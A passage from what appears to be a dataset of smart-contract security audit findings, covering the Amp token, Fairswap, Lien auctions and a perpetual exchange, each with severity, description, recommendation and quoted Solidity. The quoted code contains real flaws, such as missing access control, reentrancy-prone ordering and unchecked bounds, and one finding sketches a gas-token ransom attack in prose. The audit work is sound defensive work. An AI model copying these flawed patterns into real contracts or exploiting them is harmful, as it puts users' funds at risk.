the length of the proof could be bounded.\\nThis could also simplify the decoding and make it more robust. For instance, in `_decodeWithdrawalOperatorData` it is unclear what happens if the data length is not a multiple of 32. It seems like it might result in out-of-bound reads.\\n```\\nuint256 proofNb = (\\_operatorData.length - 84) / 32;\\nbytes32[] memory proof = new bytes32[](proofNb);\\nuint256 index = 0;\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\nчConsider enforcing a bound on the length of Merkle proofs.\\nAlso note that if similar mitigation method as issue 5.1 is used, this method can be replaced by a simpler function using ABI Decode, which does not have any unbounded issues as the sizes of the hashes are fixed (or can be indicated in the passed objects)чч```\\nuint256 proofNb = (\\_operatorData.length - 84) / 32;\\nbytes32[] memory proof = new bytes32[](proofNb);\\nuint256 index = 0;\\nfor (uint256 i = 116; i <= \\_operatorData.length; i = i + 32) {\\n bytes32 temp;\\n assembly {\\n temp := mload(add(\\_operatorData, i))\\n }\\n proof[index] = temp;\\n index++;\\n}\\n```\\n -Mitigation for possible reentrancy in token transfersчmediumчERC777 adds significant features to the token implementation, however there are some known risks associated with this token, such as possible reentrancy attack vector. Given that the Amp token uses hooks to communicate to Collateral manager, it seems that the environment is trusted and safe. However, a minor modification to the implementation can result in safer implementation of the token transfer.\\n```\\nrequire(\\n \\_balanceOfByPartition[\\_from][\\_fromPartition] >= \\_value,\\n EC\\_52\\_INSUFFICIENT\\_BALANCE\\n);\\n\\nbytes32 toPartition = \\_fromPartition;\\nif (\\_data.length >= 64) {\\n toPartition = \\_getDestinationPartition(\\_fromPartition, \\_data);\\n}\\n\\n\\_callPreTransferHooks(\\n \\_fromPartition,\\n \\_operator,\\n \\_from,\\n \\_to,\\n \\_value,\\n \\_data,\\n \\_operatorData\\n);\\n\\n\\_removeTokenFromPartition(\\_from, \\_fromPartition, \\_value);\\n\\_transfer(\\_from, \\_to, \\_value);\\n\\_addTokenToPartition(\\_to, toPartition, \\_value);\\n\\n\\_callPostTransferHooks(\\n toPartition,\\n```\\nчIt is suggested to move any condition check that is checking the balance to after the external call. However `_callPostTransferHooks` needs to be called after the state changes, so the suggested mitigation here is to move the require at line 1152 to after `_callPreTransferHooks()` function (e.g. line 1171).чч```\\nrequire(\\n \\_balanceOfByPartition[\\_from][\\_fromPartition] >= \\_value,\\n EC\\_52\\_INSUFFICIENT\\_BALANCE\\n);\\n\\nbytes32 toPartition = \\_fromPartition;\\nif (\\_data.length >= 64) {\\n toPartition = \\_getDestinationPartition(\\_fromPartition, \\_data);\\n}\\n\\n\\_callPreTransferHooks(\\n \\_fromPartition,\\n \\_operator,\\n \\_from,\\n \\_to,\\n \\_value,\\n \\_data,\\n \\_operatorData\\n);\\n\\n\\_removeTokenFromPartition(\\_from, \\_fromPartition, \\_value);\\n\\_transfer(\\_from, \\_to, \\_value);\\n\\_addTokenToPartition(\\_to, toPartition, \\_value);\\n\\n\\_callPostTransferHooks(\\n toPartition,\\n```\\n -Potentially inconsistent input validationчmediumчThere are some functions that might require additional input validation (similar to other functions):\\nAmp.transferWithData: `require(_isOperator(msg.sender, _from), EC_58_INVALID_OPERATOR);` like in\\n```\\nrequire(\\_isOperator(msg.sender, \\_from), EC\\_58\\_INVALID\\_OPERATOR);\\n```\\n\\nAmp.authorizeOperatorByPartition: `require(_operator != msg.sender);` like in\\n```\\nrequire(\\_operator != msg.sender);\\n```\\n\\nAmp.revokeOperatorByPartition: `require(_operator != msg.sender);` like in\\n```\\nrequire(\\_operator != msg.sender);\\n```\\nчConsider adding additional input validation.чч```\\nrequire(\\_isOperator(msg.sender, \\_from), EC\\_58\\_INVALID\\_OPERATOR);\\n```\\n -ERC20 compatibility of Amp token using defaultPartitionчmediumчIt is somewhat unclear how the Amp token ensures ERC20 compatibility. While the `default` partition is used in some places (for instance, in function balanceOf) there are also separate fields for (aggregated) balances/allowances. This seems to introduce some redundancy and raises certain questions about when which fields are relevant.\\n`_allowed` is used in function `allowance` instead of `_allowedByPartition` with the default partition\\nAn `Approval` event should be emitted when approving the default partition\\n```\\nemit ApprovalByPartition(\\_partition, \\_tokenHolder, \\_spender, \\_amount);\\n```\\n\\n`increaseAllowance()` vs. `increaseAllowanceByPartition()`чAfter the mid-audit discussion, it was clear that the general `balanceOf` method (with no partition) is not needed and can be replaced with a `balanceOf` function that returns balance of the default partition, similarly for allowance, the general `increaseAllowance` function can simply call `increaseAllowanceByPartition` using default partition (same for decreaseAllowance).чч```\\nemit ApprovalByPartition(\\_partition, \\_tokenHolder, \\_spender, \\_amount);\\n```\\n -Additional validation for canReceiveчlowчFor `FlexaCollateralManager.tokensReceived` there is validation to ensure that only the Amp calls the function. In contrast, there is no such validation for `canReceive` and it is unclear if this is the intention.\\n```\\nrequire(msg.sender == amp, \"Invalid sender\");\\n```\\nчConsider adding a conjunct `msg.sender == amp` in function `_canReceive`.\\n```\\nfunction \\_canReceive(address \\_to, bytes32 \\_destinationPartition) internal view returns (bool) {\\n return \\_to == address(this) && partitions[\\_destinationPartition];\\n}\\n```\\nчч```\\nrequire(msg.sender == amp, \"Invalid sender\");\\n```\\n -Discrepancy between code and commentsчlowчThere are some discrepancies between (uncommented) code and the documentations comment:\\n```\\n// Indicate token verifies Amp, ERC777 and ERC20 interfaces\\nERC1820Implementer.\\_setInterface(AMP\\_INTERFACE\\_NAME);\\nERC1820Implementer.\\_setInterface(ERC20\\_INTERFACE\\_NAME);\\n// ERC1820Implementer.\\_setInterface(ERC777\\_INTERFACE\\_NAME);\\n```\\n\\n```\\n/\\*\\*\\n \\* @notice Indicates a supply refund was executed\\n \\* @param supplier Address whose refund authorization was executed\\n \\* @param partition Partition from which the tokens were transferred\\n \\* @param amount Amount of tokens transferred\\n \\*/\\nevent SupplyRefund(\\n address indexed supplier,\\n bytes32 indexed partition,\\n uint256 amount,\\n uint256 indexed nonce\\n);\\n```\\nчConsider updating either the code or the comment.чч```\\n// Indicate token verifies Amp, ERC777 and ERC20 interfaces\\nERC1820Implementer.\\_setInterface(AMP\\_INTERFACE\\_NAME);\\nERC1820Implementer.\\_setInterface(ERC20\\_INTERFACE\\_NAME);\\n// ERC1820Implementer.\\_setInterface(ERC777\\_INTERFACE\\_NAME);\\n```\\n -Several fields could potentially be private AcknowledgedчlowчSeveral fields in `Amp` could possibly be private:\\nswapToken:\\n```\\nISwapToken public swapToken;\\n```\\n\\nswapTokenGraveyard:\\n```\\naddress public constant swapTokenGraveyard = 0x000000000000000000000000000000000000dEaD;\\n```\\n\\ncollateralManagers:\\n```\\naddress[] public collateralManagers;\\n```\\n\\npartitionStrategies:\\n```\\nbytes4[] public partitionStrategies;\\n```\\n\\nThe same hold for several fields in `FlexaCollateralManager`. For instance:\\npartitions:\\n```\\nmapping(bytes32 => bool) public partitions;\\n```\\n\\nnonceToSupply:\\n```\\nmapping(uint256 => Supply) public nonceToSupply;\\n```\\n\\nwithdrawalRootToNonce:\\n```\\nmapping(bytes32 => uint256) public withdrawalRootToNonce;\\n```\\nчDouble-check that you really want to expose those fields.чч```\\nISwapToken public swapToken;\\n```\\n -Several fields could be declared immutable AcknowledgedчlowчSeveral fields could be declared immutable to make clear that they never change after construction:\\nAmp._name:\\n```\\nstring internal \\_name;\\n```\\n\\nAmp._symbol:\\n```\\nstring internal \\_symbol;\\n```\\n\\nAmp.swapToken:\\n```\\nISwapToken public swapToken;\\n```\\n\\nFlexaCollateralManager.amp:\\n```\\naddress public amp;\\n```\\nчUse the `immutable` annotation in Solidity (see Immutable).чч```\\nstring internal \\_name;\\n```\\n -A reverting fallback function will lock up all payoutsчhighч```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n (bool success, ) = \\_recipient.call{value: \\_amount}(\\n abi.encodeWithSignature(\"\")\\n );\\n require(success, \"Transfer Failed\");\\n}\\n```\\n\\nThe `_payment()` function processes a list of transfers to settle the transactions in an `ExchangeBox`. If any of the recipients of an Eth transfer is a smart contract that reverts, then the entire payout will fail and will be unrecoverable.чImplement a queuing mechanism to allow buyers/sellers to initiate the withdrawal on their own using a ‘pull-over-push pattern.'\\nIgnore a failed transfer and leave the responsibility up to users to receive them properly.чч```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n (bool success, ) = \\_recipient.call{value: \\_amount}(\\n abi.encodeWithSignature(\"\")\\n );\\n require(success, \"Transfer Failed\");\\n}\\n```\\n -Force traders to mint gas tokenчhighчAttack scenario:\\nAlice makes a large trade via the Fairswap_iDOLvsEth exchange. This will tie up her iDOL until the box is executed.\\nMallory makes a small trades to buy ETH immediately afterwards, the trades are routed through an attack contract.\\nAlice needs to execute the box to get her iDOL out.\\nBecause the gas amount is unlimited, when you Mallory's ETH is paid out to her attack contract, mint a lot of GasToken.\\nIf Alice has $100 worth of ETH tied up in the exchange, you can basically ransom her for $99 of gas token or else she'll never see her funds again.\\n```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n```\\nчWhen sending ETH, a pull-payment model is generally preferable.\\nThis would require setting up a queue, allowing users to call a function to initiate a withdrawal.чч```\\nfunction \\_transferETH(address \\_recipient, uint256 \\_amount) private {\\n```\\n -Missing Proper Access ControlчhighчSome functions do not have proper access control and are `public`, meaning that anyone can call them. This will result in system take over depending on how critical those functionalities are.\\n```\\n \\*/\\nfunction setIDOLContract(address contractAddress) public {\\n require(address(\\_IDOLContract) == address(0), \"IDOL contract is already registered\");\\n \\_setStableCoinContract(contractAddress);\\n}\\n```\\nчMake the `setIDOLContract()` function `internal` and call it from the constructor, or only allow the `deployer` to set the value.чч```\\n \\*/\\nfunction setIDOLContract(address contractAddress) public {\\n require(address(\\_IDOLContract) == address(0), \"IDOL contract is already registered\");\\n \\_setStableCoinContract(contractAddress);\\n}\\n```\\n -Code is not production-readyчhighчSimilar to other discussed issues, several areas of the code suggest that the system is not production-ready. This results in narrow test scenarios that do not cover production code flow.\\nisNotStartedAuction\\ninAcceptingBidsPeriod\\ninRevealingValuationPeriod\\ninReceivingBidsPeriod\\n```\\n/\\*\\n// Indicates any auction has never held for a specified BondID\\nfunction isNotStartedAuction(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n return closingTime == 0;\\n}\\n\\n// Indicates if the auctionID is in bid acceptance status\\nfunction inAcceptingBidsPeriod(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n```\\n\\n```\\n// TEST\\nfunction isNotStartedAuction(bytes32 auctionID)\\n public\\n virtual\\n override\\n returns (bool)\\n{\\n return true;\\n}\\n\\n// TEST\\nfunction inAcceptingBidsPeriod(bytes32 auctionID)\\n```\\n\\nThese commented-out functions contain essential functionality for the Auction contract. For example, `inRevealingValuationPeriod` is used to allow revealing of the bid price publicly:\\n```\\nrequire(\\n inRevealingValuationPeriod(auctionID),\\n \"it is not the time to reveal the value of bids\"\\n);\\n```\\nчRemove the test functions and use the production code for testing. The tests must have full coverage of the production code to be considered complete.чч```\\n/\\*\\n// Indicates any auction has never held for a specified BondID\\nfunction isNotStartedAuction(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n return closingTime == 0;\\n}\\n\\n// Indicates if the auctionID is in bid acceptance status\\nfunction inAcceptingBidsPeriod(bytes32 auctionID) public virtual override returns (bool) {\\n uint256 closingTime = \\_auctionClosingTime[auctionID];\\n```\\n -Unreachable code due to checked conditionsчmediumч```\\nfunction revealBid(\\n bytes32 auctionID,\\n uint256 price,\\n uint256 targetSBTAmount,\\n uint256 random\\n) public override {\\n require(\\n inRevealingValuationPeriod(auctionID),\\n \"it is not the time to reveal the value of bids\"\\n );\\n```\\n\\nHowever, later in the same function, code exists to introduce “Penalties for revealing too early.” This checks to see if the function was called before closing, which should not be possible given the previous check.\\n```\\n/\\*\\*\\n \\* @dev Penalties for revealing too early.\\n \\* Some participants may not follow the rule and publicate their bid information before the reveal process.\\n \\* In such a case, the bid price is overwritten by the bid with the strike price (slightly unfavored price).\\n \\*/\\nuint256 bidPrice = price;\\n\\n/\\*\\*\\n \\* @dev FOR TEST CODE RUNNING: The following if statement in L533 should be replaced by the comment out\\n \\*/\\nif (inAcceptingBidsPeriod(auctionID)) {\\n // if (false) {\\n (, , uint256 solidStrikePriceE4, ) = \\_getBondFromAuctionID(auctionID);\\n bidPrice = \\_exchangeSBT2IDOL(solidStrikePriceE4.mul(10\\*\\*18));\\n}\\n```\\nчResolution\\nComment from Lien Protocol:\\nDouble-check the logic in these functions. If revealing should be allowed (but penalized in the earlier stage), the first check should be changed. However, based on our understanding, the first check is correct, and the second check for early reveal is redundant and should be removed.чч```\\nfunction revealBid(\\n bytes32 auctionID,\\n uint256 price,\\n uint256 targetSBTAmount,\\n uint256 random\\n) public override {\\n require(\\n inRevealingValuationPeriod(auctionID),\\n \"it is not the time to reveal the value of bids\"\\n );\\n```\\n -Fairswap: inconsistent checks on _executionOrder()чlowчThe `_executionOrder()` function should only be called under specific conditions. However, these conditions are not always consistently defined.\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n\\n```\\nif (nextBoxNumber > 1 && nextBoxNumber >= nextExecuteBoxNumber) {\\n```\\nчResolution\\nComment from Lien Protocol:\\nReduce duplicate code by defining an internal function to perform this check. A clear, descriptive name will help to clarify the intention.чч```\\nif (nextBoxNumber > 1 && nextBoxNumber > nextExecuteBoxNumber) {\\n```\\n -Inconsistency in DecimalSafeMath implementationsчlowчThere are two different implementations of `DecimalSafeMath` in the 3 FairSwap repositories.\\n```\\nlibrary DecimalSafeMath {\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n uint256 a\\_ = a \\* 1000000000000000000;\\n uint256 c = a\\_ / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n\\n```\\nlibrary DecimalSafeMath {\\n\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n \\n uint256 c = (a \\* 1000000000000000000) / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\nчTry removing duplicate code/libraries and using a better inheritance model to include one file in all FairSwaps.чч```\\nlibrary DecimalSafeMath {\\n function decimalDiv(uint256 a, uint256 b)internal pure returns (uint256) {\\n // assert(b > 0); // Solidity automatically throws when dividing by 0\\n uint256 a\\_ = a \\* 1000000000000000000;\\n uint256 c = a\\_ / b;\\n // assert(a == b \\* c + a % b); // There is no case in which this doesn't hold\\n return c;\\n }\\n```\\n -Exchange - CancelOrder has no effect PendingчhighчThe exchange provides means for the `trader` or `broker` to cancel the order. The `cancelOrder` method, however, only stores the hash of the canceled order in mapping but the mapping is never checked. It is therefore effectively impossible for a `trader` to cancel an order.\\n```\\nfunction cancelOrder(LibOrder.Order memory order) public {\\n require(msg.sender == order.trader || msg.sender == order.broker, \"invalid caller\");\\n\\n bytes32 orderHash = order.getOrderHash();\\n cancelled[orderHash] = true;\\n\\n emit Cancel(orderHash);\\n}\\n```\\nч`matchOrders*` or `validateOrderParam` should check if `cancelled[orderHash] == true` and abort fulfilling the order.\\nVerify the order params (Signature) before accepting it as canceled.чч```\\nfunction cancelOrder(LibOrder.Order memory order) public {\\n require(msg.sender == order.trader || msg.sender == order.broker, \"invalid caller\");\\n\\n bytes32 orderHash = order.getOrderHash();\\n cancelled[orderHash] = true;\\n\\n emit Cancel(orderHash);\\n}\\n```\\n -Perpetual - withdraw should only be available in NORMAL state PendingчhighчAccording to the specification `withdraw` can only be called in `NORMAL` state. However, the implementation allows it to be called in `NORMAL` and `SETTLED` mode.\\nWithdraw only checks for `!SETTLING` state which resolves to `NORMAL` and `SETTLED`.\\n```\\nfunction withdraw(uint256 amount) public {\\n withdrawFromAccount(msg.sender, amount);\\n}\\n```\\n\\n```\\nfunction withdrawFromAccount(address payable guy, uint256 amount) private {\\n require(guy != address(0), \"invalid guy\");\\n require(status != LibTypes.Status.SETTLING, \"wrong perpetual status\");\\n\\n uint256 currentMarkPrice = markPrice();\\n require(isSafeWithPrice(guy, currentMarkPrice), \"unsafe before withdraw\");\\n remargin(guy, currentMarkPrice);\\n address broker = currentBroker(guy);\\n bool forced = broker == address(amm.perpetualProxy()) || broker == address(0);\\n withdraw(guy, amount, forced);\\n\\n require(isSafeWithPrice(guy, currentMarkPrice), \"unsafe after withdraw\");\\n require(availableMarginWithPrice(guy, currentMarkPrice) >= 0, \"withdraw margin\");\\n}\\n```\\n\\nIn contrast, `withdrawFor` requires the state to be NORMAL:\\n```\\nfunction withdrawFor(address payable guy, uint256 amount) public onlyWhitelisted {\\n require(status == LibTypes.Status.NORMAL, \"wrong perpetual status\");\\n withdrawFromAccount(guy, amount);\\n}\\n```\\nчResolution\\nThis issue was resolved by requiring `status == LibTypes.Status.NORMAL`.\\n`withdraw` should only be available in the `NORMAL` operation mode.чч```\\nfunction withdraw(uint256 amount) public {\\n withdrawFromAccount(msg.sender, amount);\\n}\\n```\\n -Perpetual - withdrawFromInsuranceFund should check wadAmount instead of rawAmount Pendingчhighч`withdrawFromInsurance` checks that enough funds are in the insurance fund before allowing withdrawal by an admin by checking the provided `rawAmount` <= insuranceFundBalance.toUint256(). `rawAmount` is the `ETH` (18 digit precision) or collateral token amount (can be less than 18 digit precision) to be withdrawn while `insuranceFundBalance` is a WAD-denominated value (18 digit precision).\\nThe check does not hold if the configured collateral has different precision and may have unwanted consequences, e.g. the withdrawal of more funds than expected.\\nNote: there is another check for `insuranceFundBalance` staying positive after the potential external call to collateral.\\n```\\nfunction withdrawFromInsuranceFund(uint256 rawAmount) public onlyWhitelistAdmin {\\n require(rawAmount > 0, \"invalid amount\");\\n require(insuranceFundBalance > 0, \"insufficient funds\");\\n require(rawAmount <= insuranceFundBalance.toUint256(), \"insufficient funds\");\\n\\n int256 wadAmount = toWad(rawAmount);\\n insuranceFundBalance = insuranceFundBalance.sub(wadAmount);\\n withdrawFromProtocol(msg.sender, rawAmount);\\n\\n require(insuranceFundBalance >= 0, \"negtive insurance fund\");\\n\\n emit UpdateInsuranceFund(insuranceFundBalance);\\n}\\n```\\n\\nWhen looking at the test-cases there seems to be a misconception about what unit of amount `withdrawFromInsuranceFund` is taking. For example, the insurance fund withdrawal and deposit are not tested for collateral that specifies a precision that is not 18. The test-cases falsely assume that the input to `withdrawFromInsuranceFund` is a WAD value, while it is taking the collateral's `rawAmount` which is then converted to a WAD number.\\ncode/test/test_perpetual.js:L471-L473\\n```\\nawait perpetual.withdrawFromInsuranceFund(toWad(10.111));\\nfund = await perpetual.insuranceFundBalance();\\nassert.equal(fund.toString(), 0);\\n```\\nчCheck that `require(wadAmount <= insuranceFundBalance.toUint256(), \"insufficient funds\");`, add a test-suite testing the insurance fund with collaterals with different precision and update existing tests that properly provide the expected input to `withdraFromInsurance`.чч```\\nfunction withdrawFromInsuranceFund(uint256 rawAmount) public onlyWhitelistAdmin {\\n require(rawAmount > 0, \"invalid amount\");\\n require(insuranceFundBalance > 0, \"insufficient funds\");\\n require(rawAmount <= insuranceFundBalance.toUint256(), \"insufficient funds\");\\n\\n int256 wadAmount = toWad(rawAmount);\\n insuranceFundBalance = insuranceFundBalance.sub(wadAmount);\\n withdrawFromProtocol(msg.sender, rawAmount);\\n\\n require(insuranceFundBalance >= 0, \"negtive insurance fund\");\\n\\n emit UpdateInsuranceFund(insuranceFundBalance);\\n}\\n```\\n -Perpetual - liquidateFrom should not have public visibility Pendingчhighч`Perpetual.liquidate` is used to liquidate an account that is “unsafe,” determined by the relative sizes of `marginBalanceWithPrice` and maintenanceMarginWithPrice:\\n```\\n// safe for liquidation\\nfunction isSafeWithPrice(address guy, uint256 currentMarkPrice) public returns (bool) {\\n return\\n marginBalanceWithPrice(guy, currentMarkPrice) >=\\n maintenanceMarginWithPrice(guy, currentMarkPrice).toInt256();\\n}\\n```\\n\\n`Perpetual.liquidate` allows the caller to assume the liquidated account's position, as well as a small amount of “penalty collateral.” The steps to liquidate are, roughly:\\nClose the liquidated account's position\\nPerform a trade on the liquidated assets with the liquidator acting as counter-party\\nGrant the liquidator a portion of the liquidated assets as a reward. An additional portion is added to the insurance fund.\\nHandle any losses\\nWe found several issues in Perpetual.liquidate:\\n`liquidateFrom` has `public` visibility:\\n```\\nfunction liquidateFrom(address from, address guy, uint256 maxAmount) public returns (uint256, uint256) {\\n```\\n\\nGiven that `liquidate` only calls `liquidateFrom` after checking the current contract's status, this oversight allows anyone to call `liquidateFrom` during the `SETTLED` stage:\\n```\\nfunction liquidate(address guy, uint256 maxAmount) public returns (uint256, uint256) {\\n require(status != LibTypes.Status.SETTLED, \"wrong perpetual status\");\\n return liquidateFrom(msg.sender, guy, maxAmount);\\n}\\n```\\n\\nAdditionally, directly calling `liquidateFrom` allows anyone to liquidate on behalf of other users, forcing other accounts to assume liquidated positions.\\nFinally, neither `liquidate` nor `liquidateFrom` check that the liquidated account and liquidator are the same. Though the liquidation accounting process is hard to follow, we believe this is unintended and could lead to large errors in internal contract accounting.чMake `liquidateFrom` an `internal` function\\nIn `liquidate` or `liquidateFrom`, check that `msg.sender != guy`чч```\\n// safe for liquidation\\nfunction isSafeWithPrice(address guy, uint256 currentMarkPrice) public returns (bool) {\\n return\\n marginBalanceWithPrice(guy, currentMarkPrice) >=\\n maintenanceMarginWithPrice(guy, currentMarkPrice).toInt256();\\n}\\n```\\n -Unpredictable behavior due to front running or general bad timing PendingчhighчIn a number of cases, administrators of contracts can update or upgrade things in the system without warning. This has the potential to violate a security goal of the system.\\nSpecifically, privileged roles could use front running to make malicious changes just ahead of incoming transactions, or purely accidental negative effects could occur due to unfortunate timing of changes.\\nSome instances of this are more important than others, but in general users of the system should have assurances about the behavior of the action they're about to take.\\nThe deployer of the `PerpetualGovernance`, `AMMGovernance`, and `GlobalConfig` contracts are set as administrators for the contracts through `WhitelistedRole`. The `WhitelistedAdminRole` can whitelist other accounts at any time and allow them to perform actions protected by the `onlyWhitelisted` decorator.\\nUpdating governance and global configuration parameters are not protected by a time-lock and take effect immediately. This, therefore, creates an opportunity for administrators to front-run users on the exchange by changing parameters for orders. It may also allow an administrator to temporarily lift restrictions for themselves (e.g. withdrawalLockBlockCount).\\n`GlobalConfig`\\n`withdrawalLockBlockCount` is queried when applying for withdrawal. This value can be set zero enabling allowing immediate withdrawal.\\n`brokerLockBlockCount` is queried when setting a new broker. This value can e set to zero effectively enabling immediate broker changes.\\n```\\nfunction setGlobalParameter(bytes32 key, uint256 value) public onlyWhitelistAdmin {\\n if (key == \"withdrawalLockBlockCount\") {\\n withdrawalLockBlockCount = value;\\n } else if (key == \"brokerLockBlockCount\") {\\n brokerLockBlockCount = value;\\n } else {\\n revert(\"key not exists\");\\n }\\n emit UpdateGlobalParameter(key, value);\\n}\\n```\\n\\n`PerpetualGovernance`\\ne.g. Admin can front-run specific `matchOrder` calls and set arbitrary dev fees or curve parameters…\\n```\\nfunction setGovernanceParameter(bytes32 key, int256 value) public onlyWhitelistAdmin {\\n if (key == \"initialMarginRate\") {\\n governance.initialMarginRate = value.toUint256();\\n require(governance.initialMarginRate > 0, \"require im > 0\");\\n require(governance.initialMarginRate < 10\\*\\*18, \"require im < 1\");\\n require(governance.maintenanceMarginRate < governance.initialMarginRate, \"require mm < im\");\\n } else if (key == \"maintenanceMarginRate\") {\\n governance.maintenanceMarginRate = value.toUint256();\\n require(governance.maintenanceMarginRate > 0, \"require mm > 0\");\\n require(governance.maintenanceMarginRate < governance.initialMarginRate, \"require mm < im\");\\n require(governance.liquidationPenaltyRate < governance.maintenanceMarginRate, \"require lpr < mm\");\\n require(governance.penaltyFundRate < governance.maintenanceMarginRate, \"require pfr < mm\");\\n } else if (key == \"liquidationPenaltyRate\") {\\n governance.liquidationPenaltyRate = value.toUint256();\\n require(governance.liquidationPenaltyRate < governance.maintenanceMarginRate, \"require lpr < mm\");\\n } else if (key == \"penaltyFundRate\") {\\n governance.penaltyFundRate = value.toUint256();\\n require(governance.penaltyFundRate < governance.maintenanceMarginRate, \"require pfr < mm\");\\n } else if (key == \"takerDevFeeRate\") {\\n governance.takerDevFeeRate = value;\\n } else if (key == \"makerDevFeeRate\") {\\n governance.makerDevFeeRate = value;\\n } else if (key == \"lotSize\") {\\n require(\\n governance.tradingLotSize == 0 || governance.tradingLotSize.mod(value.toUint256()) == 0,\\n \"require tls % ls == 0\"\\n );\\n governance.lotSize = value.toUint256();\\n } else if (key == \"tradingLotSize\") {\\n require(governance.lotSize == 0 || value.toUint256().mod(governance.lotSize) == 0, \"require tls % ls == 0\");\\n governance.tradingLotSize = value.toUint256();\\n } else if (key == \"longSocialLossPerContracts\") {\\n require(status == LibTypes.Status.SETTLING, \"wrong perpetual status\");\\n socialLossPerContracts[uint256(LibTypes.Side.LONG)] = value;\\n } else if (key == \"shortSocialLossPerContracts\") {\\n require(status == LibTypes.Status.SETTLING, \"wrong perpetual status\");\\n socialLossPerContracts[uint256(LibTypes.Side.SHORT)] = value;\\n } else {\\n revert(\"key not exists\");\\n }\\n emit UpdateGovernanceParameter(key, value);\\n}\\n```\\n\\nAdmin can set `devAddress` or even update to a new `amm` and `globalConfig`\\n```\\nfunction setGovernanceAddress(bytes32 key, address value) public onlyWhitelistAdmin {\\n require(value != address(0x0), \"invalid address\");\\n if (key == \"dev\") {\\n devAddress = value;\\n } else if (key == \"amm\") {\\n amm = IAMM(value);\\n } else if (key == \"globalConfig\") {\\n globalConfig = IGlobalConfig(value);\\n } else {\\n revert(\"key not exists\");\\n }\\n emit UpdateGovernanceAddress(key, value);\\n}\\n```\\n\\n`AMMGovernance`\\n```\\nfunction setGovernanceParameter(bytes32 key, int256 value) public onlyWhitelistAdmin {\\n if (key == \"poolFeeRate\") {\\n governance.poolFeeRate = value.toUint256();\\n } else if (key == \"poolDevFeeRate\") {\\n governance.poolDevFeeRate = value.toUint256();\\n } else if (key == \"emaAlpha\") {\\n require(value > 0, \"alpha should be > 0\");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n } else if (key == \"updatePremiumPrize\") {\\n governance.updatePremiumPrize = value.toUint256();\\n } else if (key == \"markPremiumLimit\") {\\n governance.markPremiumLimit = value;\\n } else if (key == \"fundingDampener\") {\\n governance.fundingDampener = value;\\n } else {\\n revert(\"key not exists\");\\n }\\n emit UpdateGovernanceParameter(key, value);\\n}\\n```\\nчThe underlying issue is that users of the system can't be sure what the behavior of a function call will be, and this is because the behavior can change at any time.\\nWe recommend giving the user advance notice of changes with a time lock. For example, make all updates to system parameters or upgrades require two steps with a mandatory time window between them. The first step merely broadcasts to users that a particular change is coming, and the second step commits that change after a suitable waiting period.\\nAdditionally, users should verify the whitelist setup before using the contract system and monitor it for new additions to the whitelist. Documentation should clearly outline what roles are owned by whom to support suitability. Sane parameter bounds should be enforced (e.g. min. disallow block delay of zero )чч```\\nfunction setGlobalParameter(bytes32 key, uint256 value) public onlyWhitelistAdmin {\\n if (key == \"withdrawalLockBlockCount\") {\\n withdrawalLockBlockCount = value;\\n } else if (key == \"brokerLockBlockCount\") {\\n brokerLockBlockCount = value;\\n } else {\\n revert(\"key not exists\");\\n }\\n emit UpdateGlobalParameter(key, value);\\n}\\n```\\n -AMM - Governance is able to set an invalid alpha value PendingчmediumчAccording to https://en.wikipedia.org/wiki/Moving_average\\nThe coefficient α represents the degree of weighting decrease, a constant smoothing factor between 0 and 1. A higher α discounts older observations faster.\\nHowever, the code does not check upper bounds. An admin may, therefore, set an invalid alpha that puts `emaAlpha2` out of bounds or negative.\\n```\\n} else if (key == \"emaAlpha\") {\\n require(value > 0, \"alpha should be > 0\");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n```\\nчEnsure that the system configuration is always within safe bounds. Document expected system variable types and their safe operating ranges. Enforce that bounds are checked every time a value is set. Enforce safe defaults when deploying contracts.\\nEnsure `emaAlpha` is `0 < value < 1 WAD`чч```\\n} else if (key == \"emaAlpha\") {\\n require(value > 0, \"alpha should be > 0\");\\n governance.emaAlpha = value;\\n emaAlpha2 = 10\\*\\*18 - governance.emaAlpha;\\n emaAlpha2Ln = emaAlpha2.wln();\\n```\\n -Exchange - insufficient input validation in matchOrders Pendingчmediumч`matchOrders` does not check that that the sender has provided the same number of `amounts` as `makerOrderParams`. When fewer `amounts` exist than `makerOrderParams`, the method will revert because of an out-of-bounds array access. When fewer `makerOrderParams` exist than `amounts`, the method will succeed, and the additional values in `amounts` will be ignored.\\nAdditionally, the method allows the sender to provide no `makerOrderParams` at all, resulting in no state changes.\\n`matchOrders` also does not reject trades with an amount set to zero. Such orders should be rejected because they do not comply with the minimum `tradingLotSize` configured for the system. As a side-effect, events may be emitted for zero-amount trades and unexpected state changes may occur.\\n```\\nfunction matchOrders(\\n LibOrder.OrderParam memory takerOrderParam,\\n LibOrder.OrderParam[] memory makerOrderParams,\\n address \\_perpetual,\\n uint256[] memory amounts\\n) public {\\n```\\n\\n```\\nfunction matchOrderWithAMM(LibOrder.OrderParam memory takerOrderParam, address \\_perpetual, uint256 amount) public {\\n```\\nчResolution\\nThis issue was addressed by following the recommendation to verify that `amounts.length > 0 && makerOrderParams.length == amounts.length`. However, the code does not abort if one of the `amounts` is zero which should never happen and therefore raise an exception due to it likely being an 